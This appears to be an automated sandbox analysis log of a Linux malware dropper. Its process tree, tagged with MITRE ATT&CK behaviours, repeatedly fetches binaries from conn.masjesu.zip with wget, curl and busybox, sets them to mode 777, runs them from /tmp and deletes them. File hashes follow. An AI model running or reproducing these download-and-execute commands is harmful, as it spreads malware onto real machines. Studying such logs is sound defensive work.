/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:983
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:986
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:987
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:990
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:993
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:994
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:997
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:998
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:999
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:1000
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:1001
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1002
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:1004
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:1005
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:1006
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:1007
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:1008
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1009
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1011
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:1012
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:1013
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:1014
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- System Network Configuration Discovery
PID:1015
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1016
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1018
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:1019
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:1020
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:1021
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:1022
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1023
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:1025
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:1026
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:1027
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:1029
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97